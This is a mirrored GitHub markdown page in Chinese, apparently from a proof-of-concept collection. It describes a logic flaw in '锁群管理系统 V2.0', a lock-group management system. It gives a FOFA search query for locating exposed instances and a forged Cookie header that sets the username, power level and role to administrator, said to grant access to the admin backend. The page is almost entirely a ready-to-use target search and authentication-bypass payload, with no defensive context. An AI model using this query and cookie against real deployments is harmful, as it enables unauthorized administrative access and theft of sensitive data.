mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
21 lines
641 B
Markdown
21 lines
641 B
Markdown
|
|
# 锁群管理系统存在逻辑缺陷漏洞
|
|||
|
|
锁群管理系统存在逻辑缺陷漏洞,攻击者可利用该漏洞获取敏感信息。
|
|||
|
|
|
|||
|
|
## fofa
|
|||
|
|
|
|||
|
|
```javascript
|
|||
|
|
title=="锁群管理系统 V2.0"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
## poc
|
|||
|
|
cookie中添加如下内容,即可进入后台
|
|||
|
|
|
|||
|
|
```javascript
|
|||
|
|
Cookie: ASP.NET_SessionId=evadd1jksrepp4gtbgockcbi; username=admin; power=1; powerName=%e8%b6%85%e7%ba%a7%e7%ae%a1%e7%90%86%e5%91%98; code=admin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|